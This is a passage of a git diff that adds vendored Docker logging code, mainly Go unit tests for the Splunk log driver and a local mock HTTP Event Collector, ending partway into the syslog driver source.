+			t.Fatalf("Unexpected event in message 1 %v", event)
+		}
+	}
+
+	message2 := hec.messages[1]
+	if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) ||
+		message2.Host != hostname ||
+		message2.Source != "" ||
+		message2.SourceType != "" ||
+		message2.Index != "" {
+		t.Fatalf("Unexpected values of message 2 %v", message2)
+	}
+
+	// If message cannot be parsed as JSON - it should be sent as a line
+	if event, err := message2.EventAsMap(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event["line"] != "notjson" ||
+			event["source"] != "stdout" ||
+			event["tag"] != "containeriid" ||
+			len(event) != 3 {
+			t.Fatalf("Unexpected event in message 2 %v", event)
+		}
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify raw format
+func TestRawFormat(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:    hec.URL(),
+			splunkTokenKey:  hec.token,
+			splunkFormatKey: splunkFormatRaw,
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	hostname, err := ctx.Hostname()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if !hec.connectionVerified {
+		t.Fatal("By default connection should be verified")
+	}
+
+	splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerRaw)
+	if !ok {
+		t.Fatal("Unexpected Splunk Logging Driver type")
+	}
+
+	if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" ||
+		splunkLoggerDriver.auth != "Splunk "+hec.token ||
+		splunkLoggerDriver.nullMessage.Host != hostname ||
+		splunkLoggerDriver.nullMessage.Source != "" ||
+		splunkLoggerDriver.nullMessage.SourceType != "" ||
+		splunkLoggerDriver.nullMessage.Index != "" ||
+		splunkLoggerDriver.gzipCompression != false ||
+		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
+		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
+		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
+		cap(splunkLoggerDriver.stream) != defaultStreamChannelSize ||
+		string(splunkLoggerDriver.prefix) != "containeriid " {
+		t.Fatal("Values do not match configuration.")
+	}
+
+	message1Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+	message2Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 2 {
+		t.Fatal("Expected two messages")
+	}
+
+	message1 := hec.messages[0]
+	if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) ||
+		message1.Host != hostname ||
+		message1.Source != "" ||
+		message1.SourceType != "" ||
+		message1.Index != "" {
+		t.Fatalf("Unexpected values of message 1 %v", message1)
+	}
+
+	if event, err := message1.EventAsString(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event != "containeriid {\"a\":\"b\"}" {
+			t.Fatalf("Unexpected event in message 1 %v", event)
+		}
+	}
+
+	message2 := hec.messages[1]
+	if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) ||
+		message2.Host != hostname ||
+		message2.Source != "" ||
+		message2.SourceType != "" ||
+		message2.Index != "" {
+		t.Fatalf("Unexpected values of message 2 %v", message2)
+	}
+
+	if event, err := message2.EventAsString(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event != "containeriid notjson" {
+			t.Fatalf("Unexpected event in message 1 %v", event)
+		}
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify raw format with labels
+func TestRawFormatWithLabels(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:    hec.URL(),
+			splunkTokenKey:  hec.token,
+			splunkFormatKey: splunkFormatRaw,
+			labelsKey:       "a",
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+		ContainerLabels: map[string]string{
+			"a": "b",
+		},
+	}
+
+	hostname, err := ctx.Hostname()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if !hec.connectionVerified {
+		t.Fatal("By default connection should be verified")
+	}
+
+	splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerRaw)
+	if !ok {
+		t.Fatal("Unexpected Splunk Logging Driver type")
+	}
+
+	if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" ||
+		splunkLoggerDriver.auth != "Splunk "+hec.token ||
+		splunkLoggerDriver.nullMessage.Host != hostname ||
+		splunkLoggerDriver.nullMessage.Source != "" ||
+		splunkLoggerDriver.nullMessage.SourceType != "" ||
+		splunkLoggerDriver.nullMessage.Index != "" ||
+		splunkLoggerDriver.gzipCompression != false ||
+		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
+		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
+		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
+		cap(splunkLoggerDriver.stream) != defaultStreamChannelSize ||
+		string(splunkLoggerDriver.prefix) != "containeriid a=b " {
+		t.Fatal("Values do not match configuration.")
+	}
+
+	message1Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+	message2Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 2 {
+		t.Fatal("Expected two messages")
+	}
+
+	message1 := hec.messages[0]
+	if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) ||
+		message1.Host != hostname ||
+		message1.Source != "" ||
+		message1.SourceType != "" ||
+		message1.Index != "" {
+		t.Fatalf("Unexpected values of message 1 %v", message1)
+	}
+
+	if event, err := message1.EventAsString(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event != "containeriid a=b {\"a\":\"b\"}" {
+			t.Fatalf("Unexpected event in message 1 %v", event)
+		}
+	}
+
+	message2 := hec.messages[1]
+	if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) ||
+		message2.Host != hostname ||
+		message2.Source != "" ||
+		message2.SourceType != "" ||
+		message2.Index != "" {
+		t.Fatalf("Unexpected values of message 2 %v", message2)
+	}
+
+	if event, err := message2.EventAsString(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event != "containeriid a=b notjson" {
+			t.Fatalf("Unexpected event in message 1 %v", event)
+		}
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify that Splunk Logging Driver can accept tag="" which will allow to send raw messages
+// in the same way we get them in stdout/stderr
+func TestRawFormatWithoutTag(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:    hec.URL(),
+			splunkTokenKey:  hec.token,
+			splunkFormatKey: splunkFormatRaw,
+			tagKey:          "",
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	hostname, err := ctx.Hostname()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if !hec.connectionVerified {
+		t.Fatal("By default connection should be verified")
+	}
+
+	splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerRaw)
+	if !ok {
+		t.Fatal("Unexpected Splunk Logging Driver type")
+	}
+
+	if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" ||
+		splunkLoggerDriver.auth != "Splunk "+hec.token ||
+		splunkLoggerDriver.nullMessage.Host != hostname ||
+		splunkLoggerDriver.nullMessage.Source != "" ||
+		splunkLoggerDriver.nullMessage.SourceType != "" ||
+		splunkLoggerDriver.nullMessage.Index != "" ||
+		splunkLoggerDriver.gzipCompression != false ||
+		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
+		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
+		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
+		cap(splunkLoggerDriver.stream) != defaultStreamChannelSize ||
+		string(splunkLoggerDriver.prefix) != "" {
+		t.Log(string(splunkLoggerDriver.prefix) + "a")
+		t.Fatal("Values do not match configuration.")
+	}
+
+	message1Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+	message2Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 2 {
+		t.Fatal("Expected two messages")
+	}
+
+	message1 := hec.messages[0]
+	if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) ||
+		message1.Host != hostname ||
+		message1.Source != "" ||
+		message1.SourceType != "" ||
+		message1.Index != "" {
+		t.Fatalf("Unexpected values of message 1 %v", message1)
+	}
+
+	if event, err := message1.EventAsString(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event != "{\"a\":\"b\"}" {
+			t.Fatalf("Unexpected event in message 1 %v", event)
+		}
+	}
+
+	message2 := hec.messages[1]
+	if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) ||
+		message2.Host != hostname ||
+		message2.Source != "" ||
+		message2.SourceType != "" ||
+		message2.Index != "" {
+		t.Fatalf("Unexpected values of message 2 %v", message2)
+	}
+
+	if event, err := message2.EventAsString(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event != "notjson" {
+			t.Fatalf("Unexpected event in message 1 %v", event)
+		}
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify that we will send messages in batches with default batching parameters,
+// but change frequency to be sure that numOfRequests will match expected 17 requests
+func TestBatching(t *testing.T) {
+	if err := os.Setenv(envVarPostMessagesFrequency, "10h"); err != nil {
+		t.Fatal(err)
+	}
+
+	hec := NewHTTPEventCollectorMock(t)
+
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:   hec.URL(),
+			splunkTokenKey: hec.token,
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	for i := 0; i < defaultStreamChannelSize*4; i++ {
+		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != defaultStreamChannelSize*4 {
+		t.Fatal("Not all messages delivered")
+	}
+
+	for i, message := range hec.messages {
+		if event, err := message.EventAsMap(); err != nil {
+			t.Fatal(err)
+		} else {
+			if event["line"] != fmt.Sprintf("%d", i) {
+				t.Fatalf("Unexpected event in message %v", event)
+			}
+		}
+	}
+
+	// 1 to verify connection and 16 batches
+	if hec.numOfRequests != 17 {
+		t.Fatalf("Unexpected number of requests %d", hec.numOfRequests)
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarPostMessagesFrequency, ""); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify that test is using time to fire events not rare than specified frequency
+func TestFrequency(t *testing.T) {
+	if err := os.Setenv(envVarPostMessagesFrequency, "5ms"); err != nil {
+		t.Fatal(err)
+	}
+
+	hec := NewHTTPEventCollectorMock(t)
+
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:   hec.URL(),
+			splunkTokenKey: hec.token,
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	for i := 0; i < 10; i++ {
+		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+			t.Fatal(err)
+		}
+		time.Sleep(15 * time.Millisecond)
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 10 {
+		t.Fatal("Not all messages delivered")
+	}
+
+	for i, message := range hec.messages {
+		if event, err := message.EventAsMap(); err != nil {
+			t.Fatal(err)
+		} else {
+			if event["line"] != fmt.Sprintf("%d", i) {
+				t.Fatalf("Unexpected event in message %v", event)
+			}
+		}
+	}
+
+	// 1 to verify connection and 10 to verify that we have sent messages with required frequency,
+	// but because frequency is too small (to keep test quick), instead of 11, use 9 if context switches will be slow
+	if hec.numOfRequests < 9 {
+		t.Fatalf("Unexpected number of requests %d", hec.numOfRequests)
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarPostMessagesFrequency, ""); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Simulate behavior similar to first version of Splunk Logging Driver, when we were sending one message
+// per request
+func TestOneMessagePerRequest(t *testing.T) {
+	if err := os.Setenv(envVarPostMessagesFrequency, "10h"); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarPostMessagesBatchSize, "1"); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarBufferMaximum, "1"); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarStreamChannelSize, "0"); err != nil {
+		t.Fatal(err)
+	}
+
+	hec := NewHTTPEventCollectorMock(t)
+
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:   hec.URL(),
+			splunkTokenKey: hec.token,
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	for i := 0; i < 10; i++ {
+		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 10 {
+		t.Fatal("Not all messages delivered")
+	}
+
+	for i, message := range hec.messages {
+		if event, err := message.EventAsMap(); err != nil {
+			t.Fatal(err)
+		} else {
+			if event["line"] != fmt.Sprintf("%d", i) {
+				t.Fatalf("Unexpected event in message %v", event)
+			}
+		}
+	}
+
+	// 1 to verify connection and 10 messages
+	if hec.numOfRequests != 11 {
+		t.Fatalf("Unexpected number of requests %d", hec.numOfRequests)
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarPostMessagesFrequency, ""); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarPostMessagesBatchSize, ""); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarBufferMaximum, ""); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarStreamChannelSize, ""); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Driver should not be created when HEC is unresponsive
+func TestVerify(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+	hec.simulateServerError = true
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:   hec.URL(),
+			splunkTokenKey: hec.token,
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	_, err := New(ctx)
+	if err == nil {
+		t.Fatal("Expecting driver to fail, when server is unresponsive")
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify that user can specify to skip verification that Splunk HEC is working.
+// Also in this test we verify retry logic.
+func TestSkipVerify(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+	hec.simulateServerError = true
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:              hec.URL(),
+			splunkTokenKey:            hec.token,
+			splunkVerifyConnectionKey: "false",
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if hec.connectionVerified {
+		t.Fatal("Connection should not be verified")
+	}
+
+	for i := 0; i < defaultStreamChannelSize*2; i++ {
+		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	if len(hec.messages) != 0 {
+		t.Fatal("No messages should be accepted at this point")
+	}
+
+	hec.simulateServerError = false
+
+	for i := defaultStreamChannelSize * 2; i < defaultStreamChannelSize*4; i++ {
+		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != defaultStreamChannelSize*4 {
+		t.Fatal("Not all messages delivered")
+	}
+
+	for i, message := range hec.messages {
+		if event, err := message.EventAsMap(); err != nil {
+			t.Fatal(err)
+		} else {
+			if event["line"] != fmt.Sprintf("%d", i) {
+				t.Fatalf("Unexpected event in message %v", event)
+			}
+		}
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify logic for when we filled whole buffer
+func TestBufferMaximum(t *testing.T) {
+	if err := os.Setenv(envVarPostMessagesBatchSize, "2"); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarBufferMaximum, "10"); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarStreamChannelSize, "0"); err != nil {
+		t.Fatal(err)
+	}
+
+	hec := NewHTTPEventCollectorMock(t)
+	hec.simulateServerError = true
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:              hec.URL(),
+			splunkTokenKey:            hec.token,
+			splunkVerifyConnectionKey: "false",
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if hec.connectionVerified {
+		t.Fatal("Connection should not be verified")
+	}
+
+	for i := 0; i < 11; i++ {
+		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	if len(hec.messages) != 0 {
+		t.Fatal("No messages should be accepted at this point")
+	}
+
+	hec.simulateServerError = false
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 9 {
+		t.Fatalf("Expected # of messages %d, got %d", 9, len(hec.messages))
+	}
+
+	// First 1000 messages are written to daemon log when buffer was full
+	for i, message := range hec.messages {
+		if event, err := message.EventAsMap(); err != nil {
+			t.Fatal(err)
+		} else {
+			if event["line"] != fmt.Sprintf("%d", i+2) {
+				t.Fatalf("Unexpected event in message %v", event)
+			}
+		}
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarPostMessagesBatchSize, ""); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarBufferMaximum, ""); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarStreamChannelSize, ""); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify that we are not blocking close when HEC is down for the whole time
+func TestServerAlwaysDown(t *testing.T) {
+	if err := os.Setenv(envVarPostMessagesBatchSize, "2"); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarBufferMaximum, "4"); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarStreamChannelSize, "0"); err != nil {
+		t.Fatal(err)
+	}
+
+	hec := NewHTTPEventCollectorMock(t)
+	hec.simulateServerError = true
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:              hec.URL(),
+			splunkTokenKey:            hec.token,
+			splunkVerifyConnectionKey: "false",
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if hec.connectionVerified {
+		t.Fatal("Connection should not be verified")
+	}
+
+	for i := 0; i < 5; i++ {
+		if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 0 {
+		t.Fatal("No messages should be sent")
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarPostMessagesBatchSize, ""); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarBufferMaximum, ""); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Setenv(envVarStreamChannelSize, ""); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Cannot send messages after we close driver
+func TestCannotSendAfterClose(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:   hec.URL(),
+			splunkTokenKey: hec.token,
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := loggerDriver.Log(&logger.Message{[]byte("message1"), "stdout", time.Now(), nil, false}); err != nil {
+		t.Fatal(err)
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := loggerDriver.Log(&logger.Message{[]byte("message2"), "stdout", time.Now(), nil, false}); err == nil {
+		t.Fatal("Driver should not allow to send messages after close")
+	}
+
+	if len(hec.messages) != 1 {
+		t.Fatal("Only one message should be sent")
+	}
+
+	message := hec.messages[0]
+	if event, err := message.EventAsMap(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event["line"] != "message1" {
+			t.Fatalf("Unexpected event in message %v", event)
+		}
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go
new file mode 100644
index 0000000000..e508948280
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go
@@ -0,0 +1,157 @@
+package splunk
+
+import (
+	"compress/gzip"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"testing"
+)
+
+func (message *splunkMessage) EventAsString() (string, error) {
+	if val, ok := message.Event.(string); ok {
+		return val, nil
+	}
+	return "", fmt.Errorf("Cannot cast Event %v to string", message.Event)
+}
+
+func (message *splunkMessage) EventAsMap() (map[string]interface{}, error) {
+	if val, ok := message.Event.(map[string]interface{}); ok {
+		return val, nil
+	}
+	return nil, fmt.Errorf("Cannot cast Event %v to map", message.Event)
+}
+
+type HTTPEventCollectorMock struct {
+	tcpAddr     *net.TCPAddr
+	tcpListener *net.TCPListener
+
+	token               string
+	simulateServerError bool
+
+	test *testing.T
+
+	connectionVerified bool
+	gzipEnabled        *bool
+	messages           []*splunkMessage
+	numOfRequests      int
+}
+
+func NewHTTPEventCollectorMock(t *testing.T) *HTTPEventCollectorMock {
+	tcpAddr := &net.TCPAddr{IP: []byte{127, 0, 0, 1}, Port: 0, Zone: ""}
+	tcpListener, err := net.ListenTCP("tcp", tcpAddr)
+	if err != nil {
+		t.Fatal(err)
+	}
+	return &HTTPEventCollectorMock{
+		tcpAddr:             tcpAddr,
+		tcpListener:         tcpListener,
+		token:               "4642492F-D8BD-47F1-A005-0C08AE4657DF",
+		simulateServerError: false,
+		test:                t,
+		connectionVerified:  false}
+}
+
+func (hec *HTTPEventCollectorMock) URL() string {
+	return "http://" + hec.tcpListener.Addr().String()
+}
+
+func (hec *HTTPEventCollectorMock) Serve() error {
+	return http.Serve(hec.tcpListener, hec)
+}
+
+func (hec *HTTPEventCollectorMock) Close() error {
+	return hec.tcpListener.Close()
+}
+
+func (hec *HTTPEventCollectorMock) ServeHTTP(writer http.ResponseWriter, request *http.Request) {
+	var err error
+
+	hec.numOfRequests++
+
+	if hec.simulateServerError {
+		if request.Body != nil {
+			defer request.Body.Close()
+		}
+		writer.WriteHeader(http.StatusInternalServerError)
+		return
+	}
+
+	switch request.Method {
+	case http.MethodOptions:
+		// Verify that options method is getting called only once
+		if hec.connectionVerified {
+			hec.test.Errorf("Connection should not be verified more than once. Got second request with %s method.", request.Method)
+		}
+		hec.connectionVerified = true
+		writer.WriteHeader(http.StatusOK)
+	case http.MethodPost:
+		// Always verify that Driver is using correct path to HEC
+		if request.URL.String() != "/services/collector/event/1.0" {
+			hec.test.Errorf("Unexpected path %v", request.URL)
+		}
+		defer request.Body.Close()
+
+		if authorization, ok := request.Header["Authorization"]; !ok || authorization[0] != ("Splunk "+hec.token) {
+			hec.test.Error("Authorization header is invalid.")
+		}
+
+		gzipEnabled := false
+		if contentEncoding, ok := request.Header["Content-Encoding"]; ok && contentEncoding[0] == "gzip" {
+			gzipEnabled = true
+		}
+
+		if hec.gzipEnabled == nil {
+			hec.gzipEnabled = &gzipEnabled
+		} else if gzipEnabled != *hec.gzipEnabled {
+			// Nothing wrong with that, but we just know that Splunk Logging Driver does not do that
+			hec.test.Error("Driver should not change Content Encoding.")
+		}
+
+		var gzipReader *gzip.Reader
+		var reader io.Reader
+		if gzipEnabled {
+			gzipReader, err = gzip.NewReader(request.Body)
+			if err != nil {
+				hec.test.Fatal(err)
+			}
+			reader = gzipReader
+		} else {
+			reader = request.Body
+		}
+
+		// Read body
+		var body []byte
+		body, err = ioutil.ReadAll(reader)
+		if err != nil {
+			hec.test.Fatal(err)
+		}
+
+		// Parse message
+		messageStart := 0
+		for i := 0; i < len(body); i++ {
+			if i == len(body)-1 || (body[i] == '}' && body[i+1] == '{') {
+				var message splunkMessage
+				err = json.Unmarshal(body[messageStart:i+1], &message)
+				if err != nil {
+					hec.test.Log(string(body[messageStart : i+1]))
+					hec.test.Fatal(err)
+				}
+				hec.messages = append(hec.messages, &message)
+				messageStart = i + 1
+			}
+		}
+
+		if gzipEnabled {
+			gzipReader.Close()
+		}
+
+		writer.WriteHeader(http.StatusOK)
+	default:
+		hec.test.Errorf("Unexpected HTTP method %s", http.MethodOptions)
+		writer.WriteHeader(http.StatusBadRequest)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go
new file mode 100644
index 0000000000..fb9e867ff5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go
@@ -0,0 +1,262 @@
+// Package syslog provides the logdriver for forwarding server logs to syslog endpoints.
+package syslog
+
+import (
+	"crypto/tls"
+	"errors"
+	"fmt"
+	"net"
+	"net/url"
+	"os"
+	"strconv"
+	"strings"
+	"time"
+
+	syslog "github.com/RackSec/srslog"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/loggerutils"
+	"github.com/docker/docker/pkg/urlutil"
+	"github.com/docker/go-connections/tlsconfig"
+)
+
+const (
+	name        = "syslog"
+	secureProto = "tcp+tls"
+)
+
+var facilities = map[string]syslog.Priority{
+	"kern":     syslog.LOG_KERN,
+	"user":     syslog.LOG_USER,
+	"mail":     syslog.LOG_MAIL,
+	"daemon":   syslog.LOG_DAEMON,
+	"auth":     syslog.LOG_AUTH,
+	"syslog":   syslog.LOG_SYSLOG,
